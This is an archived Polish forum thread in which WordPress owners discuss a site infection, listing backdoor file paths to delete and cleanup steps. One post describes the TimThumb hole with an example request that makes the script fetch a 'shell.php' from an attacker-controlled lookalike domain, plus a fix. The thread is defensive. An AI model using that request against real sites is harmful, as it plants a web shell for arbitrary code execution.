Skocz do zawartości

Wirus na stronie z WP. Jak działać?


fortunately102

Rekomendowane odpowiedzi

Temat wirusa jeszcze nie został wyczerpany. Ważne - (więc wybaczcie mi post pod postem). U mnie jeszcze zarażony był plik wp-settings.php oraz wp-config.php (linia 2097 wysyła dane i hasła do autora!) chociaż skaner ich nie wykrywał. Sprawdźcie swoje pliki, bo jest tego więcej i nadal Wasze dane są ogólnodostępne. Wszystkim zainteresowanym polecam tę lekturę, bo wirus pchał się też w inne pliki.

paq studio YouTube

Masz Ducati? Patrz sklep Do Dukata | Agencja SEO Paq Studio

Odnośnik do komentarza
Udostępnij na innych stronach

Paq w takich wypadkach najszybszym rozwiązaniem jest

- backup zewnętrzny,

- usunięcie wszystkich plików z FTP,

- zmiana haseł mysql/ftp,

- wgranie czystego WordPress i wtyczek

- wgranie grafik użytych we wpisach ( przejrzeć katalogi czy nie mają ukrytych plików php )

- wgranie layoutu od nowa ( lub gdy był modyfikowany dokładne sprawdzenie plików i zawartości katalogów np. z JS.

- uzupełnienie wp-config.php odpowiednimi danymi.

Oczywiście przy założeniu, że luka przez którą uzyskano dostęp jest załatana.

Kilka do kilkunastu minut i strona już działa.

W zależności od rodzaju infekcji modyfikowane są pliki, dodawane są w możliwie najgłębszych katalogach pliki php a spotkałem się nawet z modyfikacją .htaccess i rewrite

Odnośnik do komentarza
Udostępnij na innych stronach

Atak polega na podszyciu się pod serwis np. youtube.com w taki sposób:

www.youtbue.com.domenaatakujacego.pl

i wykonaniu żądania:

timthumb.php?src=www.youtbue.com.domenaatakujacego.pl/shell.php

Plik zostanie utworzony w folderze cache a jego nazwa to (md5).php dzięki czemu możemy wykonać dowolny kod.

Rozwiązaniem problemu jest zamiana:

$allowedSites = array (

'flickr.com',

'picasa.com',

'blogger.com',

'wordpress.com',

'img.youtube.com',

);

na

$allowedSites = array ();

Dzięki czemu wyłączmy zaufane adresy i możemy nadal korzystać ze skryptu.

Z tego co spojrzałem dużo stron jest na to podatne.

Odnośnik do komentarza
Udostępnij na innych stronach

UWAGA!

Kiedy opisywalem powyzszy problem, ktory mnie także dotknął - wszyscy na zagranicznych forach pisali o bibliotece timthumb. Wykluczylem ja - jako, że z niej nie korzystalem ALE jak sie okazalo dwa moje pluginy korzystaly!

Plikow do usuniecia jest wiecej niz tu opisanych.

Do usuniecia:

/wp-content/upd.php - do usunięcia

/wp-admin/upd.php - do usunięcia

/wp-content/2b64c2f19d868305aa8bbc2d72902cc5.php - lub podobny, do usunięcia

/wp-content/uploads/feed-file.php - do usunięcia

/wp-content/uploads/feed-files.php - do usunięcia

/wp-admin/common.php - do usunięcia

Więcej info o tym włamaniu opisałem na blogu: włamanie wordpress counter-wordpress.com

edit: dopiero zauwazylem ze Paq juz lina do mojego bloga dodal ;_)

Blog Technologii WWW: DailyWeb.pl

Odnośnik do komentarza
Udostępnij na innych stronach

Ja u siebie nigdzie nie znalazłem timthumb.php a i tak dostałem zarażenie strony.

Podobne skutki, pomogło naturalnie wgranie nowych plików szablonu + wordpress. Obecnie nie wiem jak się przed tym całkowicie zabezpieczyć, ale mam nadzieję, że aktualizacje coś pomogły.

Mhm... tęskniłem?

Jeżeli szukasz kogoś, kto zrobi profesjonalne zdjęcia, to zapraszam! Fotografia Produktowa - klik klik!

Odnośnik do komentarza
Udostępnij na innych stronach

Witam,

Mam to samo. Czyli problem. Znalazłem timthumb.php który zaszyty był w templatce. Jak wy edytujecie te l10.js jquery.js bo ja nigdzie nie znalazłem dokładnie takiego kodu o jakim pisaliście. Niestety Wyświetla się cały czas komunikat o złośliwym oprogramowaniu na stronie. Nie znalazłem również plików o których była mowa wyżej tych co do kasowania. Te dwa l10.js jquery.js nadpisałem. nic to nie zmieniło. Jak tego szukać, jak sobie z tym radzić? No i mam podejżenia że ten kodzik wlepił mi się do sklepu na preście. Jak szukać na serwerze tego bagna?

Odnośnik do komentarza
Udostępnij na innych stronach

Witam,

Mam to samo. Czyli problem. Znalazłem timthumb.php który zaszyty był w templatce. Jak wy edytujecie te l10.js jquery.js bo ja nigdzie nie znalazłem dokładnie takiego kodu o jakim pisaliście. Niestety Wyświetla się cały czas komunikat o złośliwym oprogramowaniu na stronie. Nie znalazłem również plików o których była mowa wyżej tych co do kasowania. Te dwa l10.js jquery.js nadpisałem. nic to nie zmieniło. Jak tego szukać, jak sobie z tym radzić? No i mam podejżenia że ten kodzik wlepił mi się do sklepu na preście. Jak szukać na serwerze tego bagna?

Najszybciej plików zmienianych np. w ostatnich 2 tygodniach. ( wyszukiwanie FTP w FlashFXP ) czy też sortowanie plików według daty zmiany.

Odnośnik do komentarza
Udostępnij na innych stronach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności